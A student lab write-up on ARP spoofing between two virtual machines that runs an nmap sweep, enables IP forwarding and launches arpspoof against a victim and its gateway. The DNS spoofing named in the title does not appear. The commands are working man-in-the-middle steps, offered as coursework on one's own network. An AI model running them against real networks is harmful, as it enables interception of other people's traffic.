A&D of Network Security - Lab 4(ARP & DNS SPOOFING)
tags: Practicum of A&D of NS
NTU
Background
ARP SPOOFING
- Setting 2 VMs’ network interface as Bridged adapter :::danger You supposed to use your own network instead of public network :::
-
Checking IP
And check the victim gateway by
nmap
$ sudo nmap -sP 192.168.43.0/24 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-19 10:46 EDT Nmap scan report for DESKTOP-D0UCTM3 (192.168.43.56) Host is up (0.00020s latency). MAC Address: 68:54:5A:DC:03:57 (Intel Corporate) Nmap scan report for 192.168.43.66 Host is up (0.010s latency). MAC Address: D4:38:9C:87:2F:C6 (Sony) Nmap scan report for kali (192.168.43.222) Host is up (0.00040s latency). MAC Address: 08:00:27:B1:9D:67 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.43.78 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 6.13 seconds
:::info Victim VM $\to$
192.168.43.222
/ MAC $\to$08:00:27:F7:12:7A
Attacker VM $\to$192.168.43.78
/ MAC $\to$08:00:27:B1:9D:67
Default Gateway $\to$192.168.43.66
::: - Open NAT Port Forwarding
- In Attacker VM
$ sudo su $ echo 1 > /proc/sys/net/ipv4/ip_forward $ exit $ cat /proc/sys/net/ipv4/ip_forward 1
- In Victim VM
1
2
3
4$ arp -a ? (192.168.43.78) at 08:00:27:f7:12:7a [ether] on eth0 DESKTOP-D0UCTM3 (192.168.43.56) at 68:54:5a:dc:03:57 [ether] on eth0 DESKTOP-D0UCTM3 (192.168.43.56) at 68:54:5a:dc:03:57 [ether] on eth0
- In Attacker VM
- Start to attack
1
2$ sudo arpspoof -i eth0 -t 192.168.43.222 192.168.43.66 // sudo arpspoof -i {網卡介面} -t {攻擊目標 IP} {Gateway IP}
-
Result
Problem & Solved
:::info
If you can not install dsniff
, you may update and upgrade the whole system with command sudo apt-get update; sudo apt-get upgrade
(It may take lot’s of time to finish the work)
:::